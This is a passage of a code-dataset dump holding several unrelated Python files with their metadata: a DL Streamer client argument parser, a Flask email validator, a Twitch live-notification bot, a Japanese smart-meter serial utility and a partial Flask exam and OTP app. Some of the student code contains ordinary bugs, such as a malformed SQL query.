{"api_name": "flights.platform.models.Flight.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 122, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 126, "usage_type": "call"}, {"api_name": "flights.platform", "line_number": 126, "usage_type": "argument"}, {"api_name": "django.shortcuts.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.count", "line_number": 143, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 143, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pytest.mark.usefixtures", "line_number": 141, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.count", "line_number": 163, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 165, "usage_type": "call"}]}
+{"seq_id": "71341047128", "text": "import os\nimport sys\nimport json\nimport argparse\nfrom common.util import validate_extension_config\nfrom common import constants\n\ndef parse_args(args=None, program_name=\"DL Streamer Edge AI Extension Client\"):\n parser = argparse.ArgumentParser(\n prog=program_name,\n fromfile_prefix_chars=\"@\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n parser.add_argument(\n \"--protocol\",\n type=str.lower,\n choices=[constants.GRPC_PROTOCOL, constants.HTTP_PROTOCOL],\n help=\"Extension protocol (grpc or http)\",\n default=os.getenv(\"PROTOCOL\", \"grpc\").lower(),\n )\n\n parser.add_argument(\n \"-s\",\n metavar=(\"grpc_server_address\"),\n dest=\"grpc_server_address\",\n help=\"gRPC server address.\",\n default=None,\n )\n parser.add_argument(\n \"--server-ip\",\n help=\"server ip.\",\n default=\"localhost\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-url\",\n help=\"http Full URL.\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-stream-id\",\n help=\"stream id to assign pipeline to\",\n dest=\"stream_id\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-image-encoding\",\n dest=\"encoding\",\n help=\" HTTP image encoding\",\n default=\"jpeg\",\n type=str,\n choices=[\"jpeg\", \"png\", \"bmp\"],\n )\n\n parser.add_argument(\n \"--grpc-port\",\n help=\"grpc server port.\",\n type=int,\n default=int(os.getenv(\"GRPC_PORT\", constants.GRPC_PORT)),\n )\n\n parser.add_argument(\n \"--http-port\",\n help=\"http server port.\",\n type=int,\n default=int(os.getenv(\"HTTP_PORT\", constants.HTTP_PORT)),\n )\n\n parser.add_argument(\n \"-f\",\n \"--sample-file-path\",\n metavar=(\"sample_file\"),\n dest=\"sample_file\",\n help=\"Name of the sample video frame.\",\n default=\"/home/edge-ai-extension/sampleframes/sample01.png\",\n )\n parser.add_argument(\n \"--max-frames\",\n metavar=(\"max_frames\"),\n help=\"How many frames to send from video.\",\n type=int,\n default=sys.maxsize,\n )\n parser.add_argument(\n \"-l\",\n \"--loop-count\",\n metavar=(\"loop_count\"),\n help=\"How many times to loop the source after it finishes.\",\n type=int,\n default=0,\n )\n parser.add_argument(\n \"--fps-interval\",\n help=\"How often to report FPS (every N seconds)\",\n type=int,\n default=2,\n )\n parser.add_argument(\n \"--frame-rate\",\n help=\"How many frames to send per second (-1 is no limit)\",\n type=int,\n default=-1,\n )\n parser.add_argument(\n \"--frame-queue-size\",\n help=\"Max number of frames to buffer in client (0 is no limit)\",\n type=int,\n default=200,\n )\n parser.add_argument(\n \"-m\",\n \"--shared-memory\",\n action=\"store_const\",\n dest=\"use_shared_memory\",\n const=True,\n default=False,\n help=\"set to use shared memory\",\n )\n # nosec skips pybandit hits\n parser.add_argument(\n \"-o\",\n \"--output-file-path\",\n metavar=(\"output_file\"),\n dest=\"output_file\",\n help=\"Output file path\",\n default=\"/tmp/results.jsonl\",\n ) # nosec\n\n parser.add_argument(\n \"--pipeline-name\",\n action=\"store\",\n help=\"name of the pipeline to run\",\n type=str,\n default=\"object_detection\",\n )\n\n parser.add_argument(\n \"--pipeline-version\",\n action=\"store\",\n help=\"version of the pipeline to run\",\n type=str,\n default=\"person_vehicle_bike\",\n )\n\n parser.add_argument(\n \"--pipeline-parameters\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"--pipeline-extensions\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"--frame-destination\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"--scale-factor\",\n action=\"store\",\n help=\"scale factor for decoded images\",\n type=float,\n default=1.0,\n )\n\n parser.add_argument(\n \"--extension-config\",\n action=\"store\",\n help=\"extension config in .json file path or as string\",\n default=\"\",\n ) # nosec\n\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 1.0\")\n if isinstance(args, dict):\n args = [\"--{}={}\".format(key, value) for key, value in args.items() if value]\n result = parser.parse_args(args)\n if not result.grpc_server_address:\n result.grpc_server_address = \"{}:{}\".format(\n result.server_ip, result.grpc_port\n )\n return result\n\n\ndef _create_extension_config(args):\n extension_config = {}\n pipeline_config = {}\n if args.pipeline_name:\n pipeline_config[\"name\"] = args.pipeline_name\n if args.pipeline_version:\n pipeline_config[\"version\"] = args.pipeline_version\n if args.pipeline_parameters:\n try:\n pipeline_config[\"parameters\"] = json.loads(\n args.pipeline_parameters)\n except ValueError as err:\n raise Exception(\"Issue loading pipeline parameters: {}\".format(\n args.pipeline_parameters)) from err\n if args.frame_destination:\n try:\n pipeline_config[\"frame-destination\"] = json.loads(\n args.frame_destination)\n except ValueError as err:\n raise Exception(\"Issue loading frame destination: {}\".format(\n args.frame_destination)) from err\n if args.pipeline_extensions:\n try:\n pipeline_config[\"extensions\"] = json.loads(\n args.pipeline_extensions)\n except ValueError as err:\n raise Exception(\"Issue loading pipeline extensions: {}\".format(\n args.pipeline_extensions)) from err\n\n if len(pipeline_config) > 0:\n extension_config.setdefault(\"pipeline\", pipeline_config)\n\n return extension_config\n\n\ndef get_extension_config(args):\n extension_config = {}\n if args.extension_config:\n if args.extension_config.endswith(\".json\"):\n with open(args.extension_config, \"r\") as config:\n extension_config = json.loads(config.read())\n else:\n extension_config = json.loads(args.extension_config)\n else:\n extension_config = _create_extension_config(args)\n\n validate_extension_config(extension_config)\n\n return extension_config\n", "repo_name": "dlstreamer/edge-ai-extension", "sub_path": "client/arguments.py", "file_name": "arguments.py", "file_ext": "py", "file_size_in_byte": 6645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.constants.GRPC_PROTOCOL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 18, "usage_type": "name"}, {"api_name": "common.constants.HTTP_PROTOCOL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 63, "usage_type": "call"}, {"api_name": "common.constants.GRPC_PORT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 63, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 70, "usage_type": "call"}, {"api_name": "common.constants.HTTP_PORT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 70, "usage_type": "name"}, {"api_name": "sys.maxsize", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 205, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 212, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 236, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 238, "usage_type": "call"}, {"api_name": "common.util.validate_extension_config", "line_number": 242, "usage_type": "call"}]}
+{"seq_id": "38785561333", "text": "from flask import Flask, render_template, request, redirect, session, flash\napp = Flask(__name__) \nfrom mysqlconnection import connectToMySQL\napp = Flask(__name__)\nmysql = connectToMySQL('emailval')\napp.secret_key = 'secrets' \nimport re\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\n@app.route('/') \ndef index():\n return render_template(\"Email_Val.html\")\n\n\n@app.route('/process', methods=['POST'])\ndef process():\n\tif len(request.form.get('email', \"\")) < 1:\n\t\tflash ('Needs email!')\n\telif not EMAIL_REGEX.match(request.form['email']):\n\t\tflash(\"Invalid Email!\")\n\t\treturn redirect('/')\n\telse:\n\t\tquery = \"SELECT * FROM email WHERE email (email, created_at, updated_at) VALUES (%(email)s, NOW(), NOW());\"\n\t\tdata = {'email': request.form['email']}\n\t\tresults = mysql.query_db(query, data)\n\t\tif results:\n\t\t\tflash(\"email already exists!\")\n\t\t\treturn redirect(\"/\")\n\treturn ('Success!')\t\n\napp.run(debug=True) ", "repo_name": "avanover0311/Python", "sub_path": "flask/emailVal.py", "file_name": "emailVal.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "mysqlconnection.connectToMySQL", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "2000386891", "text": "# Pacotes de terceiros\r\nimport os\r\nimport threading\r\nimport time\r\n\r\nimport schedule\r\nfrom dotenv import load_dotenv\r\n\r\n# Preparar o env\r\nload_dotenv()\r\n\r\nfrom db import insert_on_stream, return_streamer_info\r\nfrom tt import tweet\r\nfrom twitch import (get_OAuth, get_stream_title, get_streamer_name,\r\n is_streamer_live)\r\nfrom utils import remove_cmds_from_title\r\n\r\n# Lista das categorias permitidas\r\ncategories = [\r\n \"Art\",\r\n \"Science & Technology\",\r\n \"Software and Game Development\",\r\n \"Makers & Crafting\",\r\n \"Talk Shows & Podcasts\",\r\n]\r\n\r\n\r\ndef main():\r\n\r\n # Definir tokens e header\r\n access_token, header = get_OAuth()\r\n\r\n # Retornar dados dos streamers\r\n results = return_streamer_info().fetchall()\r\n\r\n # Iterar streamers\r\n for streamer in results:\r\n\r\n # ID Twitch\r\n idt = streamer[1]\r\n\r\n # Verificar se está em live e retornar categoria a streamar\r\n is_live, category = is_streamer_live(idt, header)\r\n\r\n # Verificar se:\r\n # 1 - Está online\r\n # 2 - Está numa categoria permitida\r\n if is_live and category in categories:\r\n\r\n # Verificar se ele já estava live antes (na base de dados)\r\n is_live = streamer[4]\r\n\r\n # if not is_live and db.streamer_timeout(idt):\r\n if not is_live:\r\n\r\n # Titulo da live\r\n title = get_stream_title(idt, header)\r\n\r\n # Remover comandos do título\r\n title = remove_cmds_from_title(title)\r\n\r\n # Obter o URL atualiazado do canal\r\n twitch, name = get_streamer_name(idt, header)\r\n\r\n # Informações do streamer vindas da base de dados\r\n twitter = streamer[3]\r\n is_print = streamer[5]\r\n streamer_type = streamer[6]\r\n hashtags = streamer[7]\r\n\r\n # Como está em live, vamos deixar verdadeiro na base de dados\r\n insert_on_stream(idt, True)\r\n\r\n # Vamos fazer o tweet\r\n tweet(\r\n idt,\r\n name,\r\n twitch,\r\n twitter,\r\n title,\r\n is_print,\r\n streamer_type,\r\n category,\r\n hashtags,\r\n )\r\n else:\r\n # Caso não esteja em live, definir como falso\r\n insert_on_stream(idt, False)\r\n\r\n\r\ndef threaded_job(job):\r\n # Função para correr a main em modo threading\r\n thread = threading.Thread(target=main)\r\n thread.start()\r\n\r\n # Esperar pela thread terminar\r\n thread.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n schedule.every(15).seconds.do(threaded_job, main)\r\n\r\n while True:\r\n schedule.run_pending()\r\n\r\n # Performance measure\r\n time.sleep(10)\r\n", "repo_name": "andressansantos/divulgador-live", "sub_path": "src/bot/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "twitch.get_OAuth", "line_number": 31, "usage_type": "call"}, {"api_name": "db.return_streamer_info", "line_number": 34, "usage_type": "call"}, {"api_name": "twitch.is_streamer_live", "line_number": 43, "usage_type": "call"}, {"api_name": "twitch.get_stream_title", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.remove_cmds_from_title", "line_number": 60, "usage_type": "call"}, {"api_name": "twitch.get_streamer_name", "line_number": 63, "usage_type": "call"}, {"api_name": "db.insert_on_stream", "line_number": 72, "usage_type": "call"}, {"api_name": "tt.tweet", "line_number": 75, "usage_type": "call"}, {"api_name": "db.insert_on_stream", "line_number": 88, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 93, "usage_type": "call"}, {"api_name": "schedule.every", "line_number": 102, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "32749564465", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport time\nimport datetime\n\n# シリアルポート通信制御用のクラス\nclass SerialUtil():\n def __init__(self, serial, store):\n self.ser = serial\n self.store = store\n\n # ポートへの書き込み raw: bytes\n def writeb(self, raw):\n return self.ser.write(raw)\n\n # ポートへの書き込み cmd: 文字列\n # 文字列をバイト列に変換し、末尾に改行を付ける\n def write(self, cmd):\n return self.ser.write((cmd+\"\\r\\n\").encode())\n\n # ポートから1行読む\n def read(self):\n return self.ser.readline().decode()\n\n # 0.1秒待ちながらバッファが無くなるまで読む(読んだ結果は画面に表示)\n def readWhile(self):\n time.sleep(0.1)\n while self.ser.in_waiting > 0 :\n print(\"read: \"+self.read(), end=\"\")\n time.sleep(0.1)\n\n # シリアルポートにコマンド送信\n # その後、エコーバックと結果を画面に表示\n def command(self, cmd):\n print(\"command: \" + cmd)\n self.write(cmd)\n print(\"echo: \"+self.read(), end=\"\") # エコーバック\n time.sleep(0.1)\n while self.ser.in_waiting > 0 :\n print(\"back: \"+self.read(), end=\"\")\n time.sleep(0.1)\n\n # コマンドを送信し、結果を文字列で得る\n def func(self, cmd):\n print(\"func: \" + cmd)\n self.write(cmd)\n print(\"echo: \"+self.read(), end=\"\") # エコーバック\n time.sleep(0.1)\n return self.read()\n\n # スマートメーターを探す処理\n def scan(self):\n print(\"scan\")\n scanDuration = 4; # スキャン時間。サンプルでは6なんだけど、4でも行けるので。(ダメなら増やして再試行)\n scanRes = {} # スキャン結果の入れ物\n\n # スキャンのリトライループ(何か見つかるまで)\n while \"Channel\" not in scanRes :\n # アクティブスキャン(IE あり)を行う\n # 時間かかります。10秒ぐらい?\n self.write(\"SKSCAN 2 FFFFFFFF \" + str(scanDuration))\n\n # スキャン1回について、スキャン終了までのループ\n scanEnd = False\n while not scanEnd :\n line = self.read()\n print(\"read: \"+line, end=\"\")\n\n if line.startswith(\"EVENT 22\") :\n # スキャン終わったよ(見つかったかどうかは関係なく)\n scanEnd = True\n elif line.startswith(\" \") :\n # スキャンして見つかったらスペース2個あけてデータがやってくる\n # 例\n # Channel:39\n # Channel Page:09\n # Pan ID:FFFF\n # Addr:FFFFFFFFFFFFFFFF\n # LQI:A7\n # PairID:FFFFFFFF\n cols = line.strip().split(':')\n scanRes[cols[0]] = cols[1]\n scanDuration+=1\n\n if 7 < scanDuration and \"Channel\" not in scanRes:\n # 引数としては14まで指定できるが、7で失敗したらそれ以上は無駄っぽい\n print(\"err: スキャンリトライオーバー\")\n sys.exit(1) # エラー終了\n return scanRes\n\n # スマートメーターとの接続待ち\n def waitToConnect(self):\n while True :\n line = self.read()\n print(\"wait: \"+line, end=\"\")\n if line.startswith(\"EVENT 24\") :\n print(\"err: PANA 接続失敗\")\n sys.exit(1) # エラー終了\n elif line.startswith(\"EVENT 25\") :\n # 接続完了!\n return\n\n # 電力情報取得メイン処理\n def observeWatt(self, ipv6Addr):\n cnt = 0\n while True:\n cnt+=1\n print(\"count: {0}\".format(cnt))\n # ECHONET Lite フレーム作成\n # 参考資料\n # ・ECHONET-Lite_Ver.1.12_02.pdf (以下 EL)\n # ・Appendix_H.pdf (以下 AppH)\n echonetLiteFrame = b\"\"\n echonetLiteFrame += b\"\\x10\\x81\" # EHD (参考:EL p.3-2)\n echonetLiteFrame += b\"\\x00\\x01\" # TID (参考:EL p.3-3)\n # ここから EDATA\n echonetLiteFrame += b\"\\x05\\xFF\\x01\" # SEOJ (参考:EL p.3-3 AppH 「3.6 管理・操作関連機器クラスグループ 」)\n echonetLiteFrame += b\"\\x02\\x88\\x01\" # DEOJ (参考:EL p.3-3 AppH 「3.3.25 低圧スマート電力量メータクラス規定」)\n echonetLiteFrame += b\"\\x62\" # ESV(62:プロパティ値読み出し要求) (参考:EL p.3-5)\n echonetLiteFrame += b\"\\x03\" # OPC(1個)(参考:EL p.3-7)\n echonetLiteFrame += b\"\\xE0\" # E0: 積算電力量\n echonetLiteFrame += b\"\\x00\" #\n echonetLiteFrame += b\"\\xE1\" # E1: 積算電力量の単位\n echonetLiteFrame += b\"\\x00\" #\n echonetLiteFrame += b\"\\xE7\" # E7: 瞬間電力量計測値\n echonetLiteFrame += b\"\\x00\" #\n\n # コマンド送信\n command = b\"SKSENDTO 1 \"+ipv6Addr.encode()+b\" 0E1A 1 \"+format(len(echonetLiteFrame),\"04X\").encode()+b\" \" + echonetLiteFrame\n print(\"command: {0}\".format(command))\n self.writeb(command)\n\n waitTime = 0\n while True:\n time.sleep(0.1)\n if self.ser.in_waiting == 0 : # データが来てなかったら1秒待つ\n waitTime += 1\n if waitTime > 10:\n print(\"timeout!! \" + str(waitTime))\n break\n print(\"wait.. \" + str(waitTime))\n time.sleep(1)\n continue\n print(\"read..\")\n line = self.read()\n waitTime = 0\n print(\"read: \" + line, end=\"\")\n\n # 受信データはたまに違うデータが来たり、\n # 取りこぼしたりして変なデータを拾うことがあるので\n # チェックを厳しめにしてます。\n if line.startswith(\"ERXUDP\") :\n print(\"ERXUDP\")\n cols = line.strip().split(' ')\n res = cols[8] # UDP受信データ部分\n #tid = res[4:4+4];\n seoj = res[8:8+6]\n #deoj = res[14,14+6]\n ESV = res[20:20+2]\n #OPC = res[22,22+2]\n if seoj == \"028801\" and ESV == \"72\" :\n # スマートメーター(028801)から来た応答(72)なら\n EPC = res[24:24+2]\n # 先頭内容が積算電力量(E0)だったら\n if EPC == \"E0\" :\n pwMul = int(res[40:42], 16) # 位置取りコード\n pwTotal = round(int(res[28:36], 16) * self.multi(pwMul), 1) # 積算消費電力量\n pw = int(res[46:54], 16) # 瞬��消費電力量\n print(u\"計測値:{0}[W], {1}[kW], {2}\".format(pw, pwTotal, pwMul))\n self.store.store(datetime.datetime.now(), pw, pwTotal)\n break\n time.sleep(10) # 10秒\n\n # 積算消費電力量の倍率を返す\n def multi(self, x):\n if x == 0:\n return 1\n if x == 1:\n return 0.1\n if x == 2:\n return 0.01\n if x == 3:\n return 0.001\n if x == 4:\n return 0.0001\n if x == 10:\n return 10\n if x == 11:\n return 100\n if x == 12:\n return 1000\n if x == 13:\n return 10000\n print(\"err: 不明な係数\" + x)\n sys.exit(1) \n\n", "repo_name": "qtamaki/smart-meter", "sub_path": "serialUtil.py", "file_name": "serialUtil.py", "file_ext": "py", "file_size_in_byte": 7007, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 136, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 171, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 173, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 196, "usage_type": "call"}]}
+{"seq_id": "29120676373", "text": "import os\r\nfrom bson import json_util\r\nfrom flask import Flask, request, render_template, jsonify\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom datetime import datetime, date\r\nfrom mongo import insertDocument, readDocuments, appendDoc, checkifexists, fetch_marks\r\nimport json\r\nfrom twilio.rest import Client\r\nfrom dotenv import load_dotenv\r\n\r\n\r\nload_dotenv()\r\nSQLALCHEMY_DATABASE_URI = os.environ.get(\"SQLALCHEMY_DATABASE_URI\")\r\naccount_sid = os.environ.get(\"account_sid\")\r\nauth_token = os.environ.get(\"auth_token\")\r\nverify_sid = os.environ.get(\"verify_sid\")\r\n\r\n\r\napp = Flask(__name__)\r\ndb = SQLAlchemy()\r\n# app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get(\"Database_URL\")\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = SQLALCHEMY_DATABASE_URI\r\ndb.init_app(app)\r\n\r\n#####============================ AMAZON S3 BUCKET CONFIFURATION=================================================####\r\n\r\n# S3_BUCKET = \"my-bucket-name\"\r\n# S3_KEY = \"AWS_ACCESS_KEY_ID\"\r\n# S3_SECRET = \"AWS_SECRET_ACCESS_KEY\"\r\n# S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)\r\n\r\n#####============================ AMAZON S3 BUCKET CONFIFURATION=================================================####\r\n\r\n####======================================TWILIO INTEGRATION====================================================####\r\n\r\naccount_sid = account_sid\r\nauth_token = auth_token\r\nverify_sid = verify_sid\r\n\r\n\r\n@app.route(\"/smsotpPhone\", methods=[\"GET\", \"POST\"])\r\ndef otp_create():\r\n if request.method == 'POST':\r\n verified_number=request.json['phonenumber']\r\n client = Client(account_sid, auth_token)\r\n\r\n verification = client.verify.v2.services(verify_sid) \\\r\n .verifications \\\r\n .create(to=verified_number, channel=\"sms\")\r\n print(verification.status)\r\n return jsonify({\"Status\": \"OTP SENT SUCCUSSFULLY\"})\r\n\r\n\r\n@app.route(\"/smsotpver/\", methods=[\"GET\", \"POST\"])\r\ndef otp_check(verified_number):\r\n if request.method == 'POST':\r\n otp_code=request.json['otpcode']\r\n client = Client(account_sid, auth_token)\r\n verification_check = client.verify.v2.services(verify_sid) \\\r\n .verification_checks \\\r\n .create(to=verified_number, code=otp_code)\r\n ans= (verification_check.status)\r\n print(ans)\r\n return jsonify({\"verification_status\":ans})\r\n\r\n\r\n####======================================TWILIO INTEGRATION ENDS====================================================####\r\n\r\nclass Students(db.Model):\r\n enrollment_number = db.Column(db.BigInteger, primary_key=True)\r\n name = db.Column(db.String, nullable=False)\r\n email = db.Column(db.String, unique=True, nullable=False)\r\n phone_number = db.Column(db.String, unique=True, nullable=False)\r\n\r\nclass Exams(db.Model):\r\n examid= db.Column(db.Integer, primary_key= True)\r\n exam_name = db.Column(db.String, nullable= False)\r\n exam_startdate= db.Column(db.String, nullable = False)\r\n exam_starttime = db.Column(db.String, nullable=False)\r\n semester= db.Column(db.Integer, nullable= False)\r\n ## 2022-03-21 19:04:14\r\n exam_duration = db.Column(db.Integer, nullable = False)\r\n subject_code= db.Column(db.String, nullable = False)\r\n session= db.Column(db.String, nullable = False)\r\n\r\nclass Teacher(db.Model):\r\n teacherid= db.Column(db.String, nullable = False, primary_key=True)\r\n name= db.Column(db.String, nullable= False)\r\n phonenumber= db.Column(db.String, nullable = False)\r\n email= db.Column(db.String, nullable = False)\r\n\r\nwith app.app_context():\r\n db.create_all()\r\n db.session.commit()\r\n\r\n####=====================================DATABASE ENDS HERE=========================================================================####\r\n\r\n\r\n####==================================STUDENT SECTION STARTS==========================================================================####\r\n@app.route(\"/signup\", methods=[\"GET\", \"POST\"])\r\ndef user_create():\r\n if request.method == 'POST':\r\n enrollment_number = request.json['enrollment_number']\r\n name = request.json['name']\r\n email = request.json['email']\r\n phone_number = request.json['phone_number']\r\n users = Students(enrollment_number=enrollment_number, name=name, email=email, phone_number=phone_number)\r\n with app.app_context():\r\n db.session.add(users)\r\n db.session.commit()\r\n j=jsonify({\"enrollment_number\":enrollment_number, \"name\":name, \"email\":email, \"phone\":phone_number})\r\n dict= {\"enrollment_number\":enrollment_number, \"name\":name, \"email\":email, \"phone\":phone_number}\r\n insertDocument(dict)\r\n return jsonify({\"auth\":True})\r\n\r\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login():\r\n if request.method==\"POST\":\r\n enrollment_number = request.json['enrollment_number']\r\n phone_number = request.json['phone_number']\r\n with app.app_context():\r\n enrol=Students.query.filter_by(phone_number=phone_number).first()\r\n phone=Students.query.filter_by(enrollment_number=enrollment_number).first()\r\n if(enrol==phone):\r\n auth=True\r\n else:\r\n auth=False\r\n return jsonify({\"auth\":auth})\r\n\r\n####===========================STUDENT SECTION ENDS========================================================================================####\r\n\r\n#####===========================UPLOADING IMG TO AWS BUCKET=======================================#####\r\n\r\n# @app.route('/uploadimg', methods=['POST'])\r\n# def upload_file():\r\n# file = request.files['file']\r\n# s3 = boto3.client(\r\n# \"s3\",\r\n# aws_access_key_id=S3_KEY,\r\n# aws_secret_access_key=S3_SECRET\r\n# )\r\n# s3.upload_fileobj(\r\n# file,\r\n# S3_BUCKET,\r\n# file.filename,\r\n# ExtraArgs={\r\n# \"ContentType\": file.content_type\r\n# }\r\n# )\r\n#\r\n# return \"{}{}\".format(S3_LOCATION, file.filename)\r\n\r\n#####===========================UPLOADING IMG TO AWS BUCKET ENDS=======================================#####\r\n\r\n\r\n@app.route(\"/marks/\", methods=[\"POST\", \"GET\"])\r\ndef marksadd(enrollment_number):\r\n if request.method == \"POST\":\r\n enrollment = request.json['enrollment']\r\n examid = request.json[\"examid\"]\r\n flag = checkifexists(examid, enrollment)\r\n if (flag == True):\r\n marks = request.json['marks']\r\n appendDoc(marks, examid, str(enrollment_number))\r\n else:\r\n my_marks= fetch_marks(\"IEM@202318\", \"12021002019019\")\r\n print(my_marks)\r\n # my_marks= fetch_marks(examid, enrollment)\r\n return jsonify({\"marks\": my_marks})\r\n return \"Success\"\r\n\r\n\r\n@app.route(\"/createTest\", methods=[\"POST\", \"GET\"])\r\ndef create_test():\r\n if request.method==\"POST\":\r\n ExamName=request.json['ExamName']\r\n SubjectCode= request.json['SubjectCode']\r\n Session= request.json['Session']\r\n Date= request.json['Date']\r\n Starttime= request.json['StartTime']\r\n semester= request.json['semester']\r\n duration= request.json['duration']\r\n # examstartDate= datetime.strptime(Date, \"%Y-%m-%d\")\r\n # StartTime= datetime.strptime(Starttime, \"%H:%M\")\r\n exams= Exams(exam_name=ExamName, subject_code=SubjectCode, exam_startdate= Date, exam_starttime=Starttime, exam_duration= duration, session= Session, semester=semester)\r\n\r\n with app.app_context():\r\n db.session.add(exams)\r\n db.session.commit()\r\n with app.app_context():\r\n q2 = Exams.query.filter_by(exam_name=ExamName).first()\r\n print(type(q2.examid))\r\n print(q2)\r\n id=q2.examid\r\n strid= str(id)\r\n todays= date.today()\r\n finalid= \"IEM@\"+ str(todays.year) + strid\r\n return jsonify({'examid': finalid})\r\n\r\n\r\n\r\n# @app.route(\"/startcheck\", methods=[\"POST\",\"GET\"])\r\n# def startcheck():\r\n# if request.method==\"POST\":\r\n# starttest=False\r\n# examid= request.json['examid']\r\n# with app.app_context():\r\n# time= f\"select exam_starttime from Exams where examid={examid}\"\r\n# date= f\"select exam_startdate from Exams where examid={examid}\"\r\n# dur= f\"select exam_duration from Exams where examid={examid}\"\r\n# nw=datetime.now()\r\n# currdate=nw.date()\r\n# currtime= nw.time()\r\n# if(currdate== date):\r\n# if(time>currtime):\r\n# starttest=True\r\n# if(starttest==True):\r\n# return jsonify({\"examid\": examid})\r\n\r\n@app.route('/addQ', methods=['POST','GET'])\r\ndef questions():\r\n if request.method=='POST':\r\n questionList = request.json['ExamPaper']\r\n insertDocument(questionList)\r\n return jsonify({'trigger':True})\r\n\r\n\r\n\r\n\r\n@app.route('/teachersignup', methods=[\"POST\", \"GET\"])\r\ndef teachersignup():\r\n if request.method==\"POST\":\r\n 